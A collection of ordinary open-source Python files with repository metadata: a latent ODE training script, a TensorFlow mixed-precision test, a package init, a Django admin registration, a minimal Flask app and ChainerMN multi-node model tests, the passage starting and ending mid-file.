parser.add_argument('--classif', action='store_true', help="Include binary classification loss -- used for Physionet dataset for hospiral mortality")
parser.add_argument('--linear-classif', action='store_true', help="If using a classifier, use a linear classifier instead of 1-layer NN")
parser.add_argument('--extrap', action='store_true', help="Set extrapolation mode. If this flag is not set, run interpolation mode.")
parser.add_argument('-t', '--timepoints', type=int, default=100, help="Total number of time-points")
parser.add_argument('--max-t', type=float, default=5., help="We subsample points in the interval [0, args.max_tp]")
parser.add_argument('--noise-weight', type=float, default=0.01, help="Noise amplitude for generated traejctories")
args = parser.parse_args()
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
file_name = os.path.basename(__file__)[:-3]
utils.makedirs(args.save)
#####################################################################################################
if __name__ == '__main__':
torch.manual_seed(args.random_seed)
np.random.seed(args.random_seed)
experimentID = args.load
if experimentID is None:
# Make a new experiment ID
experimentID = int(SystemRandom().random()*100000)
ckpt_path = os.path.join(args.save, "experiment_" + str(experimentID) + '.ckpt')
start = time.time()
print("Sampling dataset of {} training examples".format(args.n))
input_command = sys.argv
ind = [i for i in range(len(input_command)) if input_command[i] == "--load"]
if len(ind) == 1:
ind = ind[0]
input_command = input_command[:ind] + input_command[(ind+2):]
input_command = " ".join(input_command)
utils.makedirs("results/")
##################################################################
data_obj = parse_datasets(args, device)
input_dim = data_obj["input_dim"]
classif_per_tp = False
if ("classif_per_tp" in data_obj):
# do classification per time point rather than on a time series as a whole
classif_per_tp = data_obj["classif_per_tp"]
if args.classif and (args.dataset == "hopper" or args.dataset == "periodic"):
raise Exception("Classification task is not available for MuJoCo and 1d datasets")
n_labels = 1
if args.classif:
if ("n_labels" in data_obj):
n_labels = data_obj["n_labels"]
else:
raise Exception("Please provide number of labels for classification task")
##################################################################
# Create the model
obsrv_std = 0.01
if args.dataset == "hopper":
obsrv_std = 1e-3
obsrv_std = torch.Tensor([obsrv_std]).to(device)
z0_prior = Normal(torch.Tensor([0.0]).to(device), torch.Tensor([1.]).to(device))
if args.rnn_vae:
if args.poisson:
print("Poisson process likelihood not implemented for RNN-VAE: ignoring --poisson")
# Create RNN-VAE model
model = RNN_VAE(input_dim, args.latents,
device = device,
rec_dims = args.rec_dims,
concat_mask = True,
obsrv_std = obsrv_std,
z0_prior = z0_prior,
use_binary_classif = args.classif,
classif_per_tp = classif_per_tp,
linear_classifier = args.linear_classif,
n_units = args.units,
input_space_decay = args.input_decay,
cell = args.rnn_cell,
n_labels = n_labels,
train_classif_w_reconstr = (args.dataset == "physionet")
).to(device)
elif args.classic_rnn:
if args.poisson:
print("Poisson process likelihood not implemented for RNN: ignoring --poisson")
if args.extrap:
raise Exception("Extrapolation for standard RNN not implemented")
# Create RNN model
model = Classic_RNN(input_dim, args.latents, device,
concat_mask = True, obsrv_std = obsrv_std,
n_units = args.units,
use_binary_classif = args.classif,
classif_per_tp = classif_per_tp,
linear_classifier = args.linear_classif,
input_space_decay = args.input_decay,
cell = args.rnn_cell,
n_labels = n_labels,
train_classif_w_reconstr = (args.dataset == "physionet")
).to(device)
elif args.ode_rnn:
# Create ODE-GRU model
n_ode_gru_dims = args.latents
if args.poisson:
print("Poisson process likelihood not implemented for ODE-RNN: ignoring --poisson")
if args.extrap:
raise Exception("Extrapolation for ODE-RNN not implemented")
ode_func_net = utils.create_net(n_ode_gru_dims, n_ode_gru_dims,
n_layers = args.rec_layers, n_units = args.units, nonlinear = nn.Tanh)
rec_ode_func = ODEFunc(
input_dim = input_dim,
latent_dim = n_ode_gru_dims,
ode_func_net = ode_func_net,
device = device).to(device)
z0_diffeq_solver = DiffeqSolver(input_dim, rec_ode_func, "euler", args.latents,
odeint_rtol = 1e-3, odeint_atol = 1e-4, device = device)
model = ODE_RNN(input_dim, n_ode_gru_dims, device = device,
z0_diffeq_solver = z0_diffeq_solver, n_gru_units = args.gru_units,
concat_mask = True, obsrv_std = obsrv_std,
use_binary_classif = args.classif,
classif_per_tp = classif_per_tp,
n_labels = n_labels,
train_classif_w_reconstr = (args.dataset == "physionet")
).to(device)
elif args.latent_ode:
model = create_LatentODE_model(args, input_dim, z0_prior, obsrv_std, device,
classif_per_tp = classif_per_tp,
n_labels = n_labels)
else:
raise Exception("Model not specified")
##################################################################
if args.viz:
viz = Visualizations(device)
##################################################################
#Load checkpoint and evaluate the model
if args.load is not None:
utils.get_ckpt_model(ckpt_path, model, device)
exit()
##################################################################
# Training
log_path = "logs/" + file_name + "_" + str(experimentID) + ".log"
if not os.path.exists("logs/"):
utils.makedirs("logs/")
logger = utils.get_logger(logpath=log_path, filepath=os.path.abspath(__file__))
logger.info(input_command)
optimizer = optim.Adamax(model.parameters(), lr=args.lr)
num_batches = data_obj["n_train_batches"]
for itr in range(1, num_batches * (args.niters + 1)):
optimizer.zero_grad()
utils.update_learning_rate(optimizer, decay_rate = 0.999, lowest = args.lr / 10)
wait_until_kl_inc = 10
if itr // num_batches < wait_until_kl_inc:
kl_coef = 0.
else:
kl_coef = (1-0.99** (itr // num_batches - wait_until_kl_inc))
batch_dict = utils.get_next_batch(data_obj["train_dataloader"])
train_res = model.compute_all_losses(batch_dict, n_traj_samples = 3, kl_coef = kl_coef)
train_res["loss"].backward()
optimizer.step()
n_iters_to_viz = 1
if itr % (n_iters_to_viz * num_batches) == 0:
with torch.no_grad():
test_res = compute_loss_all_batches(model,
data_obj["test_dataloader"], args,
n_batches = data_obj["n_test_batches"],
experimentID = experimentID,
device = device,
n_traj_samples = 3, kl_coef = kl_coef)
message = 'Epoch {:04d} [Test seq (cond on sampled tp)] | Loss {:.6f} | Likelihood {:.6f} | KL fp {:.4f} | FP STD {:.4f}|'.format(
itr//num_batches,
test_res["loss"].detach(), test_res["likelihood"].detach(),
test_res["kl_first_p"], test_res["std_first_p"])
logger.info("Experiment " + str(experimentID))
logger.info(message)
logger.info("KL coef: {}".format(kl_coef))
logger.info("Train loss (one batch): {}".format(train_res["loss"].detach()))
logger.info("Train CE loss (one batch): {}".format(train_res["ce_loss"].detach()))
if "auc" in test_res:
logger.info("Classification AUC (TEST): {:.4f}".format(test_res["auc"]))
if "mse" in test_res:
logger.info("Test MSE: {:.4f}".format(test_res["mse"]))
if "accuracy" in train_res:
logger.info("Classification accuracy (TRAIN): {:.4f}".format(train_res["accuracy"]))
if "accuracy" in test_res:
logger.info("Classification accuracy (TEST): {:.4f}".format(test_res["accuracy"]))
if "pois_likelihood" in test_res:
logger.info("Poisson likelihood: {}".format(test_res["pois_likelihood"]))
if "ce_loss" in test_res:
logger.info("CE loss: {}".format(test_res["ce_loss"]))
torch.save({
'args': args,
'state_dict': model.state_dict(),
}, ckpt_path)
# Plotting
if args.viz:
with torch.no_grad():
test_dict = utils.get_next_batch(data_obj["test_dataloader"])
print("plotting....")
if isinstance(model, LatentODE) and (args.dataset == "periodic"): #and not args.classic_rnn and not args.ode_rnn:
plot_id = itr // num_batches // n_iters_to_viz
viz.draw_all_plots_one_dim(test_dict, model,
plot_name = file_name + "_" + str(experimentID) + "_{:03d}".format(plot_id) + ".png",
experimentID = experimentID, save=True)
plt.pause(0.01)
torch.save({
'args': args,
'state_dict': model.state_dict(),
}, ckpt_path)
|
{
"content_hash": "07858399d807dc5429ba3e4a12d66177",
"timestamp": "",
"source": "github",
"line_count": 325,
"max_line_length": 170,
"avg_line_length": 39.68923076923077,
"alnum_prop": 0.6692766881153578,
"repo_name": "YuliaRubanova/latent_ode",
"id": "f10533171fc2500396059377961b6d856c333f10",
"size": "13031",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "run_models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "148599"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from absl.testing import parameterized
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import tf2
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import config
from tensorflow.python.framework import test_util
from tensorflow.python.keras.mixed_precision.experimental import loss_scale_optimizer as loss_scale_optimizer_v2
from tensorflow.python.keras.mixed_precision.experimental import policy
from tensorflow.python.keras.optimizer_v2 import gradient_descent as gradient_descent_v2
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
from tensorflow.python.training import gradient_descent as gradient_descent_v1
from tensorflow.python.training.experimental import loss_scale_optimizer as loss_scale_optimizer_v1
from tensorflow.python.training.experimental import mixed_precision
from tensorflow.python.training.experimental import mixed_precision_global_state
if tf2.enabled():
enable_mixed_precision_graph_rewrite = (
mixed_precision.enable_mixed_precision_graph_rewrite)
else:
enable_mixed_precision_graph_rewrite = (
mixed_precision.enable_mixed_precision_graph_rewrite_v1)
class MixedPrecisionTest(test.TestCase, parameterized.TestCase):
IGNORE_PERF_VAR = 'TF_AUTO_MIXED_PRECISION_GRAPH_REWRITE_IGNORE_PERFORMANCE'
def setUp(self):
super(MixedPrecisionTest, self).setUp()
# Enable the tests to be run on pre-Volta GPUs by telling the grappler pass
# to ignore performance and always transform the graph.
self._original_ignore_perf_value = os.getenv(self.IGNORE_PERF_VAR)
os.environ[self.IGNORE_PERF_VAR] = '1'
def tearDown(self):
# Set the IGNORE_PERF_VAR variable back to it's original value.
if self._original_ignore_perf_value is not None:
os.environ[self.IGNORE_PERF_VAR] = self._original_ignore_perf_value
else:
del os.environ[self.IGNORE_PERF_VAR]
mixed_precision.disable_mixed_precision_graph_rewrite()
super(MixedPrecisionTest, self).tearDown()
@test_util.run_in_graph_and_eager_modes
def test_wrap_optimizer(self):
opt = gradient_descent_v1.GradientDescentOptimizer(1.0)
opt = enable_mixed_precision_graph_rewrite(opt, 123.)
self.assertIsInstance(
opt, loss_scale_optimizer_v1.MixedPrecisionLossScaleOptimizer)
self.assertEqual(self.evaluate(opt._loss_scale()), 123.)
opt = gradient_descent_v2.SGD(1.0)
opt = enable_mixed_precision_graph_rewrite(opt, 123.)
self.assertIsInstance(
opt, loss_scale_optimizer_v2.LossScaleOptimizer)
self.assertEqual(self.evaluate(opt._loss_scale()), 123.)
@test_util.run_in_graph_and_eager_modes
def test_optimizer_errors(self):
opt = 1
if tf2.enabled():
expected_regex = ('"opt" must be an instance of a '
'tf.keras.optimizers.Optimizer, but got')
else:
expected_regex = ('"opt" must be an instance of a tf.train.Optimizer or '
'a tf.keras.optimizers.Optimizer, but got')
with self.assertRaisesRegexp(ValueError, expected_regex):
enable_mixed_precision_graph_rewrite(opt)
self.assertFalse(config.get_optimizer_experimental_options()
.get('auto_mixed_precision', False))
opt = gradient_descent_v1.GradientDescentOptimizer(1.0)
opt = loss_scale_optimizer_v1.MixedPrecisionLossScaleOptimizer(opt,
'dynamic')
with self.assertRaisesRegexp(ValueError,
'"opt" must not already be an instance of a '
'MixedPrecisionLossScaleOptimizer.'):
enable_mixed_precision_graph_rewrite(opt)
self.assertFalse(config.get_optimizer_experimental_options()
.get('auto_mixed_precision', False))
opt = gradient_descent_v2.SGD(1.0)
opt = loss_scale_optimizer_v2.LossScaleOptimizer(opt, 'dynamic')
with self.assertRaisesRegexp(ValueError,
'"opt" must not already be an instance of a '
'LossScaleOptimizer.'):
enable_mixed_precision_graph_rewrite(opt)
self.assertFalse(config.get_optimizer_experimental_options()
.get('auto_mixed_precision', False))
@test_util.run_gpu_only
@test_util.run_in_graph_and_eager_modes
def test_grappler_pass_enabled(self):
opt = gradient_descent_v2.SGD(1.0)
enable_mixed_precision_graph_rewrite(opt, 123.)
var = variables.Variable([[1.0]])
def overflow_in_float16():
out = var * 2 ** 10
out = math_ops.matmul(out, out)
return array_ops.reshape(out, ())
if context.executing_eagerly():
f = def_function.function(overflow_in_float16)
self.assertEqual(f().numpy(), float('Inf'))
# Outside a def_function.function, the grappler pass will not be applied.
self.assertAlmostEqual(overflow_in_float16().numpy(), 2 ** 20)
# Test disabling mixed precision.
mixed_precision.disable_mixed_precision_graph_rewrite()
self.assertEqual(f().numpy(), 2 ** 20)
else:
with session.Session() as sess:
out = overflow_in_float16()
sess.run(var.initializer)
self.assertEqual(sess.run(out), float('Inf'))
# Test Session will enable the auto_mixed_precision grappler pass in a
# ConfigProto passed by the user
with session.Session(config=config_pb2.ConfigProto()) as sess:
out = overflow_in_float16()
sess.run(var.initializer)
self.assertEqual(sess.run(out), float('Inf'))
# Test disabling mixed precision.
mixed_precision.disable_mixed_precision_graph_rewrite()
with session.Session() as sess:
out = overflow_in_float16()
sess.run(var.initializer)
self.assertAlmostEqual(sess.run(out), 2 ** 20)
@test.mock.patch.object(tf_logging, 'warn')
def test_warn_if_session_already_exists(self, mock_warn):
# Set this to False, so Sessions created in previous tests do not trigger
# the warning.
mixed_precision_global_state.non_mixed_precision_session_created = False
with session.Session():
enable_mixed_precision_graph_rewrite(gradient_descent_v2.SGD(1.0))
mock_warn.assert_any_call(
'You already have existing Sessions that do not use mixed precision. '
'enable_mixed_precision_graph_rewrite() will not affect these '
'Sessions.')
@test.mock.patch.object(tf_logging, 'warn')
def test_do_not_warn_if_session_does_not_already_exist(self, mock_warn):
# Set this to False, so Sessions created in previous tests do not trigger
# the warning.
mixed_precision_global_state.non_mixed_precision_session_created = False
enable_mixed_precision_graph_rewrite(gradient_descent_v2.SGD(1.0))
with session.Session():
# Make sure the "You already have existing Sessions" warning was not
# issued, since the Session was only created after
# enable_mixed_precision_graph_rewrite.
for call_arg in mock_warn.call_args_list:
msg = call_arg[0][0]
self.assertNotIn('You already have existing Sessions that do not use '
'mixed precision', msg)
def test_error_if_policy_is_set(self):
with policy.policy_scope('infer_float32_vars'):
with self.assertRaisesRegexp(
ValueError, 'a keras mixed precision Policy has been set'):
enable_mixed_precision_graph_rewrite(gradient_descent_v2.SGD(1.0))
# Test no error is thrown when the policy is current the default.
enable_mixed_precision_graph_rewrite(gradient_descent_v2.SGD(1.0))
if __name__ == '__main__':
test.main()
|
{
"content_hash": "afa61ca19589ca43573d2ba3e96a319c",
"timestamp": "",
"source": "github",
"line_count": 186,
"max_line_length": 112,
"avg_line_length": 43.204301075268816,
"alnum_prop": 0.6961174713787954,
"repo_name": "DavidNorman/tensorflow",
"id": "2b03906660dac407a41e1c21e29b6a837003fab9",
"size": "8726",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tensorflow/python/training/experimental/mixed_precision_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "4913"
},
{
"name": "Batchfile",
"bytes": "15272"
},
{
"name": "C",
"bytes": "774469"
},
{
"name": "C#",
"bytes": "8562"
},
{
"name": "C++",
"bytes": "74659044"
},
{
"name": "CMake",
"bytes": "6545"
},
{
"name": "Dockerfile",
"bytes": "79827"
},
{
"name": "Go",
"bytes": "1670422"
},
{
"name": "HTML",
"bytes": "4680032"
},
{
"name": "Java",
"bytes": "827737"
},
{
"name": "Jupyter Notebook",
"bytes": "540800"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "MLIR",
"bytes": "1004638"
},
{
"name": "Makefile",
"bytes": "66660"
},
{
"name": "Objective-C",
"bytes": "105247"
},
{
"name": "Objective-C++",
"bytes": "297569"
},
{
"name": "PHP",
"bytes": "23553"
},
{
"name": "Pascal",
"bytes": "3752"
},
{
"name": "Pawn",
"bytes": "14529"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "Python",
"bytes": "37406546"
},
{
"name": "RobotFramework",
"bytes": "891"
},
{
"name": "Ruby",
"bytes": "4706"
},
{
"name": "Shell",
"bytes": "452517"
},
{
"name": "Smarty",
"bytes": "31460"
},
{
"name": "Swift",
"bytes": "62814"
}
],
"symlink_target": ""
}
|
import logging
# Methods
from statsbiblioteket.github_cloner.github_cloner \
import \
github_backup, \
fetch_or_clone, \
get_github_repositories, \
parse_github_repositories, \
create_parser # This import is important for the sphinx-argparse docs
# Types
from statsbiblioteket.github_cloner.github_cloner import \
RepoType, \
UserType, \
Repository, \
Url, \
Path
__author__ = 'Asger Askov Blekinge'
__email__ = 'asger.askov.blekinge@gmail.com'
__version__ = '0.2.1rc'
logging.getLogger(__name__).addHandler(logging.NullHandler())
|
{
"content_hash": "6101679aef550de634f1774690db1358",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 74,
"avg_line_length": 24.166666666666668,
"alnum_prop": 0.6862068965517242,
"repo_name": "blekinge/github_cloner",
"id": "fd0cdf11d6ec397588e6de1133368e1cad4eff69",
"size": "673",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "statsbiblioteket/github_cloner/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "2669"
},
{
"name": "Python",
"bytes": "17228"
}
],
"symlink_target": ""
}
|
from django.contrib import admin
from .models import FacebookStatus, Subreddit, UserSubreddit
class FacebookStatusAdmin(admin.ModelAdmin):
list_display = ['__str__', 'author', 'status', 'publish_timestamp']
list_editable = ['status',]
list_filter = ['author', 'status', 'publish_timestamp']
admin.site.register(FacebookStatus, FacebookStatusAdmin)
admin.site.register(Subreddit)
admin.site.register(UserSubreddit)
|
{
"content_hash": "7ab8e8ae101372ce61fb07f9de47afb2",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 71,
"avg_line_length": 33,
"alnum_prop": 0.752913752913753,
"repo_name": "orlenko/FBBot",
"id": "012ef9b134a55e628d19a08e0e2151d0fea8ea47",
"size": "429",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/FBBot/fbposter/admin.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "126"
},
{
"name": "JavaScript",
"bytes": "2775"
},
{
"name": "Python",
"bytes": "30632"
},
{
"name": "Shell",
"bytes": "29"
}
],
"symlink_target": ""
}
|
from flask import Flask
from flask import render_template
app = Flask("__main__")
@app.route("/")
def hello():
return render_template("yatta.html")
if __name__ == "__main__":
app.run(debug=True)
|
{
"content_hash": "7a72da3ea8e12fc4c0a936d37d1c811b",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 40,
"avg_line_length": 18.727272727272727,
"alnum_prop": 0.6359223300970874,
"repo_name": "Tritlo/yatta-py",
"id": "cd8f8fad9b4ce4e5ea8f48949b1670884eb9515a",
"size": "206",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/yatta.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "93"
},
{
"name": "Makefile",
"bytes": "94"
},
{
"name": "Python",
"bytes": "652"
}
],
"symlink_target": ""
}
|
import chainer
import chainer.backends
from chainer.backends.cuda import cupy
import chainer.links as L
import chainer.testing
import chainermn
import numpy as np
import pytest
class Param(object):
def __init__(self, param):
self.dtype = None
self.__dict__.update(param)
params = [Param(p) for p in [
{
'dtype': np.float16,
}, {
'dtype': np.float32,
}, {
'dtype': chainer.mixed16
}]]
class Cycle0SubA(chainer.Chain):
def __init__(self, size):
super(Cycle0SubA, self).__init__()
with self.init_scope():
self.f = L.Linear(size, size)
def __call__(self, x):
return self.f(x)
class Cycle0SubB(chainer.Chain):
def __init__(self, size):
super(Cycle0SubB, self).__init__(
f=L.Linear(size, 2))
def __call__(self, h):
return self.f(h)
class Cycle0(chainermn.MultiNodeChainList):
def __init__(self, size, comm, rank_prev, rank_next):
super(Cycle0, self).__init__(comm=comm)
self.add_link(Cycle0SubA(size), rank_in=None, rank_out=rank_next)
self.add_link(Cycle0SubB(size), rank_in=rank_prev, rank_out=None)
class Cycle1Sub(chainer.Chain):
def __init__(self, size):
super(Cycle1Sub, self).__init__(
f=L.Linear(size, size))
def __call__(self, h):
return self.f(h)
class Cycle1(chainermn.MultiNodeChainList):
def __init__(self, size, comm, rank_prev, rank_next):
super(Cycle1, self).__init__(comm=comm)
self.add_link(Cycle1Sub(size), rank_in=rank_prev, rank_out=rank_next)
class Cross0(chainermn.MultiNodeChainList):
def __init__(self, size, comm, rank_prev, rank_next):
super(Cross0, self).__init__(comm=comm)
self.add_link(Cycle0SubA(size), rank_in=None, rank_out=rank_next)
self.add_link(Cycle0SubB(size), rank_in=rank_prev, rank_out=None)
class Cross1(chainermn.MultiNodeChainList):
def __init__(self, size, comm, rank_prev, rank_next):
super(Cross1, self).__init__(comm=comm)
self.add_link(Cycle0SubB(size), rank_in=rank_prev, rank_out=None)
self.add_link(Cycle0SubA(size), rank_in=None, rank_out=rank_next)
class BranchSubA(chainer.Chain):
def __init__(self, size):
super(BranchSubA, self).__init__(
f=L.Linear(size, size))
def __call__(self, x):
return self.f(x)
class BranchSubB(chainer.Chain):
def __init__(self, size):
super(BranchSubB, self).__init__(
f=L.Linear(size, size))
def __call__(self, *xs):
x = xs[0]
for _x in xs[1:]:
x = x + _x
return self.f(x)
class BranchParent1(chainermn.MultiNodeChainList):
def __init__(self, size, comm, rank_children):
super(BranchParent1, self).__init__(comm=comm)
self.add_link(BranchSubA(size), rank_in=None, rank_out=rank_children)
self.add_link(BranchSubB(size), rank_in=rank_children, rank_out=None)
class BranchParent2(chainermn.MultiNodeChainList):
def __init__(self, size, comm, rank_children):
super(BranchParent2, self).__init__(comm=comm)
ranks = [comm.rank] + rank_children
self.add_link(BranchSubA(size), rank_in=None, rank_out=ranks)
self.add_link(BranchSubA(size), rank_in=comm.rank, rank_out=comm.rank)
self.add_link(BranchSubB(size), rank_in=ranks, rank_out=None)
class BranchParent3(chainermn.MultiNodeChainList):
def __init__(self, size, comm, rank_children):
super(BranchParent3, self).__init__(comm=comm)
ranks = rank_children + [comm.rank]
self.add_link(BranchSubA(size), rank_in=None, rank_out=ranks)
self.add_link(BranchSubA(size), rank_in=comm.rank, rank_out=comm.rank)
self.add_link(BranchSubB(size), rank_in=ranks, rank_out=None)
class BranchParent4(chainermn.MultiNodeChainList):
def __init__(self, size, comm, rank_children):
super(BranchParent4, self).__init__(comm=comm)
ranks = rank_children + [comm.rank]
ranks = ranks[1:] + ranks[0:1]
self.add_link(BranchSubA(size), rank_in=None, rank_out=ranks)
self.add_link(BranchSubA(size), rank_in=comm.rank, rank_out=comm.rank)
self.add_link(BranchSubB(size), rank_in=ranks, rank_out=None)
class BranchChild(chainermn.MultiNodeChainList):
def __init__(self, size, comm, rank_parent):
super(BranchChild, self).__init__(comm=comm)
self.add_link(
BranchSubA(size),
rank_in=rank_parent,
rank_out=rank_parent)
class TwistFirst(chainermn.MultiNodeChainList):
def __init__(self, size, comm, rank_next):
super(TwistFirst, self).__init__(comm=comm)
self.add_link(BranchSubA(size), rank_in=None, rank_out=rank_next)
self.add_link(BranchSubA(size), rank_in=rank_next, rank_out=None)
class Twist(chainermn.MultiNodeChainList):
def __init__(self, size, comm, rank_prev, rank_next):
super(Twist, self).__init__(comm=comm)
self.add_link(BranchSubA(size), rank_in=rank_prev, rank_out=comm.rank)
self.add_link(BranchSubA(size), rank_in=None, rank_out=rank_prev)
self.add_link(BranchSubA(size), rank_in=None, rank_out=rank_next)
self.add_link(BranchSubA(size), rank_in=rank_next, rank_out=comm.rank)
self.add_link(
BranchSubB(size),
rank_in=[comm.rank, comm.rank],
rank_out=None)
class TwistLast(chainermn.MultiNodeChainList):
def __init__(self, size, comm, rank_prev):
super(TwistLast, self).__init__(comm=comm)
self.add_link(BranchSubA(size), rank_in=rank_prev, rank_out=None)
self.add_link(BranchSubA(size), rank_in=None, rank_out=rank_prev)
class TupleDataSubA(chainer.Chain):
def __init__(self, size):
super(TupleDataSubA, self).__init__(
f0=L.Linear(size, size),
f1=L.Linear(size, size))
def __call__(self, x):
y0 = self.f0(x)
y1 = self.f1(x)
return y0, y1
class TupleDataSubB(chainer.Chain):
def __init__(self, size):
super(TupleDataSubB, self).__init__(
f0=L.Linear(size, size),
f1=L.Linear(size, size))
def __call__(self, x):
# TupleDataSubB receives two elemental tuple from TupleDataSubA.
x0, x1 = x
y0 = self.f0(x0)
y1 = self.f1(x1)
return y0 + y1
class TupleDataSubC(chainer.Chain):
def __init__(self, size):
super(TupleDataSubC, self).__init__(
f=L.Linear(size, size))
def __call__(self, x):
return self.f(x)
class TupleDataParent(chainermn.MultiNodeChainList):
def __init__(self, comm, size, rank_child):
super(TupleDataParent, self).__init__(comm=comm)
self.add_link(TupleDataSubA(size), rank_in=None, rank_out=rank_child)
self.add_link(TupleDataSubC(size), rank_in=rank_child, rank_out=None)
class TupleDataChild(chainermn.MultiNodeChainList):
def __init__(self, comm, size, rank_parent):
super(TupleDataChild, self).__init__(comm=comm)
self.add_link(
TupleDataSubB(size), rank_in=rank_parent, rank_out=rank_parent)
def create_communicator(gpu):
if gpu:
communicator = chainermn.create_communicator('flat')
chainer.backends.cuda.get_device_from_id(communicator.intra_rank).use()
else:
communicator = chainermn.create_communicator('naive')
if communicator.size < 2:
pytest.skip('This test is for multinode only')
rank_next = (communicator.rank + 1) % communicator.size
rank_prev = (communicator.rank - 1) % communicator.size
return communicator, rank_next, rank_prev
def check_cycle_model(gpu, param):
communicator, rank_next, rank_prev = create_communicator(gpu)
n, d = 100, 10
with chainer.using_config('dtype', param.dtype):
if communicator.rank == 0:
X = np.random.randn(n, d).astype(param.dtype)
Y = (np.random.rand(n) * 2).astype(np.int32)
model = L.Classifier(
Cycle0(d, communicator, rank_next, rank_prev))
if gpu:
model.to_device(cupy.cuda.Device())
X = chainer.backends.cuda.to_gpu(X)
Y = chainer.backends.cuda.to_gpu(Y)
for i in range(n):
err = model(X[i:i + 1], Y[i:i + 1])
err.backward()
else:
model = Cycle1(
d, communicator, rank_next, rank_prev)
if gpu:
model.to_device(cupy.cuda.Device())
for i in range(n):
err = model()
err.backward()
@pytest.mark.parametrize('param', params)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_cycle_model_cpu(param):
check_cycle_model(False, param)
@pytest.mark.parametrize('param', params)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
@chainer.testing.attr.gpu
def test_cycle_model_gpu(param):
check_cycle_model(True, param)
def check_crossing_model(gpu, param):
communicator, rank_next, rank_prev = create_communicator(gpu)
n, d = 100, 10
X = np.random.randn(n, d).astype(param.dtype)
Y = (np.random.rand(n) * 2).astype(np.int32)
with chainer.using_config('dtype', param.dtype):
if communicator.rank == 0:
model = L.Classifier(Cross0(
d, communicator, rank_next, rank_prev))
else:
model = L.Classifier(Cross1(
d, communicator, rank_next, rank_prev))
if gpu:
model.to_device(cupy.cuda.Device())
X = chainer.backends.cuda.to_gpu(X)
Y = chainer.backends.cuda.to_gpu(Y)
for i in range(n):
err = model(X[i:i + 1], Y[i:i + 1])
err.backward()
@pytest.mark.parametrize('param', params)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_crossing_model_cpu(param):
check_crossing_model(False, param)
@pytest.mark.parametrize('param', params)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
@chainer.testing.attr.gpu
def test_crossing_model_gpu(param):
check_crossing_model(True, param)
def check_branching_model(gpu, communicator, rank_next, rank_prev,
parent_model, param):
n, d = 100, 10
X = np.random.randn(n, d).astype(param.dtype)
Y = (np.random.rand(n) * 2).astype(np.int32)
with chainer.using_config('dtype', param.dtype):
if communicator.rank == 0:
rank_children = [rank for rank in range(1, communicator.size)]
model = L.Classifier(parent_model(
d, communicator, rank_children))
if gpu:
model.to_device(cupy.cuda.Device())
X = chainer.backends.cuda.to_gpu(X)
Y = chainer.backends.cuda.to_gpu(Y)
for i in range(n):
err = model(X[i:i + 1], Y[i:i + 1])
err.backward()
else:
model = BranchChild(d, communicator, 0)
if gpu:
model.to_device(cupy.cuda.Device())
for i in range(n):
err = model()
err.backward()
def check_branching_models(gpu, param):
communicator, rank_next, rank_prev = create_communicator(gpu)
check_branching_model(gpu, communicator, rank_next, rank_prev,
BranchParent1, param)
check_branching_model(gpu, communicator, rank_next, rank_prev,
BranchParent2, param)
check_branching_model(gpu, communicator, rank_next, rank_prev,
BranchParent3, param)
check_branching_model(gpu, communicator, rank_next, rank_prev,
BranchParent4, param)
@pytest.mark.parametrize('param', params)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_branching_models_cpu(param):
check_branching_models(False, param)
@pytest.mark.parametrize('param', params)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
@chainer.testing.attr.gpu
def test_branching_models_gpu(param):
check_branching_models(True, param)
def check_twisting_model(gpu, param):
communicator, rank_next, rank_prev = create_communicator(gpu)
n, d = 100, 10
X = np.random.randn(n, d).astype(param.dtype)
Y = (np.random.rand(n) * 2).astype(np.int32)
with chainer.using_config('dtype', param.dtype):
if communicator.rank == 0:
model = L.Classifier(
TwistFirst(d, communicator, rank_next))
elif communicator.rank == communicator.size - 1:
model = L.Classifier(
TwistLast(d, communicator, rank_prev))
else:
model = L.Classifier(Twist(
d, communicator, rank_prev, rank_next))
if gpu:
model.to_device(cupy.cuda.Device())
X = chainer.backends.cuda.to_gpu(X)
Y = chainer.backends.cuda.to_gpu(Y)
for i in range(n):
err = model(X[i:i + 1], Y[i:i + 1])
err.backward()
@pytest.mark.parametrize('param', params)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_twisting_model_cpu(param):
check_twisting_model(False, param)
@pytest.mark.parametrize('param', params)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
@chainer.testing.attr.gpu
def test_twisting_model_gpu(param):
check_twisting_model(True, param)
def check_tuple_data_model(gpu, param):
# This test only uses pairs (0, 1), (2, 3), ... (2m, 2m+1)
communicator, rank_next, rank_prev = create_communicator(gpu)
n, d = 100, 10
X = np.random.randn(n, d).astype(param.dtype)
Y = (np.random.rand(n) * 2).astype(np.int32)
with chainer.using_config('dtype', param.dtype):
if communicator.rank % 2 == 0:
if communicator.rank == communicator.size - 1:
# in case 2m is the right end with odd number of nodes
return
